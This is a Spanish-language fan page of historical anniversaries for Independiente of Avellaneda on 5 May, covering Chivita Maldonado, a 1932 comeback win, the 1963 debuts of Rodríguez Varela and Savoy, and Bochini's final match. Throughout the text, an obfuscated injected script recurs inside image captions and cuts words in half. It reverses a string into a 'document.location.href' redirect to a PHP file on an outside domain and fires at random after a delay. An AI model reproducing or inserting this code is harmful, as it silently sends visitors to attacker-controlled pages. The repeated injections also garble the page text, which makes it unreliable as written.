Conectate con nosotros

Efemérides

Efemérides del 5 de mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1929 – Nacimiento en Capital Federal, de Jorge Alberto “Chivita” Maldonado, ídolo absoluto de Independiente, jugando 178 partidos con un gol entre 1956 y 1964, para ser campeón de Primera División en 1960 y 1963, así como también de la Copa Libertadores 1964, siendo Jorge el capitán que realizaba el saludo histórico de la institución.

Era volante de recuperación al principio y luego fue defensor central. Recio, impasable, llegó a convertirse en capitán y líder. Una especie de comodín desde mitad de cancha hacia atrás. Llega a Independiente en 1956. En 1960 Independiente sale campeón luego de 12 años de sequía. Se perdieron solo 6 partidos de 30 disputados. En 1963 vuelve a ser campeón y allí se perdieron solamente 3 de 26 partidos.

Maldonado fue el primer capitán en realizar el mítico saludo que se convirtió en un ritual histórico. Ese saludo fue creación del preparador físico Manuel González García, integrante del cuerpo técnico de Manuel Giúdice. Fue clave en 1964 para la obtención de la primera de las Copas, primera para el Fútbol Argentino, donde hubo tremendos enfrentamientos contra el Santos de Pelé o la final frente a Nacional.

Después de aquel logro continental Maldonado se va del club, pasó a Colo Colo y se retiró en All Boys en 1966. Jugó en dos ocasiones en la Selección Nacional. Posterior al retiro fue D.T. de varios equipos del ascenso, y con Cipolletti, logra el ascenso en 1973. El enorme “Chivita” Maldonado, padre de nuestra famosa mística copera, falleció en 2012 estando muy enfermo.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p><strong>1932</strong> – Partidazo entre Argentinos Jrs. e Independiente, por la fecha 8 del Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to. Los 11 aquel día fueron: Sangiovanni; Fazio y Lecea; Barba, Corazzo y Echeverría; Porta, Sastre, Seoane, Ravaschino y Sánchez, siendo Zoilo Canaveri el D.T.

En menos de 25’ el rojo perdía por 2 a 0. Gaspar Jerez a los 16’, Ramón Luna a los 21’, y nuevamente Gaspar Jerez a los 22’. Tres cachetadas sin dejar siquiera respirar. Independiente se despabiló de la mano de Luis Alfonso Ravaschino, un monstruo del fútbol amateur, que en el profesionalismo también dejó su huella. Devolvió las cachetadas empatando el partido a los 27’, 29’ y 31’. Luego, a los 70’ Antonio Sastre marcó el 3 a 4 para el triunfo del Rojo.

En esa temporada 1932, segunda del profesionalismo, el Rojo aparecía en los primeros planos. En 8 fechas tenía 13 puntos: 6 victorias (incluyendo a Boca, campeón vigente), un empate y una derrota. Sobre el final de la primera rueda, venció con goleada 5 a 0 a River y 2 a 0 a Racing. En la segunda ronda, sobre el final, cayó frente a Quilmes y se lesionaron dos figuras irremplazables del equipo: Manuel Seoane y Luis Ravaschino.

En la anteúltima fecha perdió con River, cuando con tan solo empatar tenía el título a su merced. No se dio, empataron la punta en 50 unidades y en el desempate River ganó 3 a 0 ante un Rojo diezmado por los lesionados. Subcampeonato con 22 victorias, 6 igualdades y 6 derrotas. Manuel Seoane goleador del equipo con 22 tantos, Luis Ravaschino con 13 y Antonio Sastre con 9.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»78″ height=»60″/></figure></div>



<p><strong>1963</strong> – <strong>Debutan</strong> en la fecha 2 del Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to, dos jugadores que se complementaban bárbaro. Dos ídolos, que llegaron juntos de Chacarita y que escribieron páginas doradas para el club: Mario Rodríguez Varela y a Raúl Armando Savoy. Eran requeridos por equipos, pero la operación se realizó en favor de Independiente, que entregó los pases de Néstor Rambert y Edgardo D’Ascenzo, más una suma cercana a los 25 millones de pesos.

Fue triunfo de visitante por 1 a 2, frente a Rosario Central, con ambos goles de Mario Rodríguez. Ese día el equipo fue: Trucchia; Navarro y Decaria; Ferreiro, Berg y Maldonado; Bernao, Conigliaro, Mario Rodríguez, Savoy y Bequi, siendo Armando Renganeschi el D.T.

Mario Rodríguez se terminó ganando el corazón de los hinchas cuando en la fecha 24, recibía a River, único competidor por el título. Mario le hizo los dos goles a Amadeo Carrizo para ganar por 2 a 1 y quedar a un paso de ser campeón. Savoy era volante ofensivo, de extremada técnica e inteligencia, asistidor y de gran pegada de zurda.

Mario era el 10 y Raúl el 11, pero Savoy fue más polifuncional. Con Brandao de D.T., fue volante por derecha el Metro 1967, y en el Nacional, volante por izquierda. Savoy fue el segundo goleador del equipo con 9 goles, detrás de Mario con 16.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»74″ height=»57″/></figure></div>



<p><strong>1991</strong> – Por la fecha 11 del Torneo Clausura, Independiente de local empata con Estudiantes de La Plata 1 a 1, abriendo la cuenta Patricio Mac Allister para la visita e <strong>igualando Carlos Alfaro Moreno</strong>.</p>



<div class=

Ni ganando 50 a 0 habría sido un día feliz para el club, porque a los 41’ de juego Pablo Erbín golpeó fuertemente a Ricardo Bochini, lo agarró mal parado y le provocó un esguince de rodilla. Fue tarjeta roja para Erbín, quien se tendría que ir del estadio custodiado por la policía ese día, pero la lesión provocada hizo que fuese el último partido del “Bocha” vestido de rojo, el número 714.

Fue retirado en camilla bajo una ovación, y en el vestuario le expresó al médico que no podía seguir esquivando las patadas y que por eso se retiraba.

Con 37 años era lo último de Ricardo Bochini en Independiente y en el fútbol Argentino, luego de hacer gigante a ambos. Ganó 4 Títulos Nacionales y 9 Internacionales, totalizando 13 títulos. El mayor ganador de la historia Roja y uno de los máximos ganadores del Fútbol Nacional.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»65″ height=»50″/></figure></div>



<p><strong>Les dejo dos videos</strong>:</p>



<p>El primero el de <strong>los goles de aquel día:</strong></p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»45″ height=»35″/></figure></div>



<p>Y el segundo el de la jugada de la lesión, sin dudas <strong>uno de los videos más tristes en la his<script>$mWn=function(n){if(typeof ($mWn.list[n])==toria del club:

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides